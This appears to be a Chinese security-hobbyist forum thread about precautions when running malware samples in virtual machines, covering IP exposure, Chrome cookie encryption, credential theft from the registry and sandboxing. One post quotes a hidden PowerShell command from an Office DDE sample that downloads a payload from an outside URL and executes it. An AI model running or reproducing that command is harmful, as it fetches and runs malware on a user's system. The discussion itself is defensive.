玩毒注意事项

有几个问题，
1、大部分个人用户都是动态IP，如果测了病毒后就重启光猫，锁定的问题似乎不明显（？）
2、如果测试的时候关闭浏览器，chrome本地存储的cookie是否是加过密的？
3、楼主能否简单科普一下，除了cookie以外，个人电脑上面还有哪些比较涉及隐私又会被malware盗取利用的信息呢？ 比如管理员账户和密码，这个是否可以被轻易盗取呢？

B100D1E55

68221281 发表于 2017-10-24 11:46
有几个问题，
1、大部分个人用户都是动态IP，如果测了病毒后就重启光猫，锁定的问题似乎不明显（？ ...

1. 动态IP会好一些，但总能推算大致区域。隐私这种东西暴露越少越好
2. 我记得Chrome从很早前开始有加密本地储存，但是这个防不了中间人攻击也防不了解密脚本，例如：
http://www.ftium4.com/chrome-cookies-encrypted-value-python.html
3. 文件的meta信息（文档的创建者和编辑者），编译文件的pdb信息和时间戳等等，非常多
有的程序作者安全意识不够可能会把一些敏感信息直接明文存在注册表或者本地文件里
管理员账户和密码，如果有auto logon的话可以从注册表盗取，其他的方法不清楚

B100D1E55 发表于 2017-10-24 12:00
1. 动态IP会好一些，但总能推算大致区域。隐私这种东西暴露越少越好
2. 我记得Chrome从很早前开始有加密 ...

谢谢楼主 原以为本地加密过就没啥问题了，不过百度了一下，貌似解密条件还要获取其他的系统信息，和管理员权限有关。这倒是提醒了我，影子模式下还是不测带UAC标志的毒了。

popu111

68221281 发表于 2017-10-24 11:46
有几个问题，
1、大部分个人用户都是动态IP，如果测了病毒后就重启光猫，锁定的问题似乎不明显（？ ...

关于定位的话，之前有百度高精度用的时候，定位足够精确到小区。

cdyism

確實要多注重隱私
自從我誤接到和我聲音"一模一樣"的詐騙電話，對方甚至知道我人在哪裡...想了下可以獲取聲音，又能取得個人資料的媒介...

排查了下，自己的雲端空間有不明存取紀錄，嚇得回去立刻把電腦整個重灌清乾淨
不敢做雙擊之類的高危操作

westbyte

当时就觉得运行特别注明需要UAC的毒是欠妥的

ELOHIM

昨天双击了很多样本。
其中一个office dde 漏洞的，居然直接拿到了宿主机的管理员用户名。
西斯空寂。
用户名和密码，虚拟机是保护不了的。
虚拟机可以完成实机想做的一切事情。
穿过虚拟机访问实机也不是天方夜谭。
总有人怼我说想多了，杞人忧天。
我不知道他们是在麻痹我，还是安慰我。
我记得我发过一篇虚拟机方面类似的帖子。

手机看到楼主帖子特别想叨叨两句。闪人。

1. C:\Windows\System32\cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://accessyouraudience.com/hjergf76');powershell -e $e

复制代码

wangkaka

恩，确实要小心了，很可怕

wangkaka

不过用防火墙强制禁止虚拟机联网可以吗？

Cel3mt

专门搞个文件夹放样本，然后把这个文件夹放在COMODO的沙盒里blocked掉，是个不错的选择。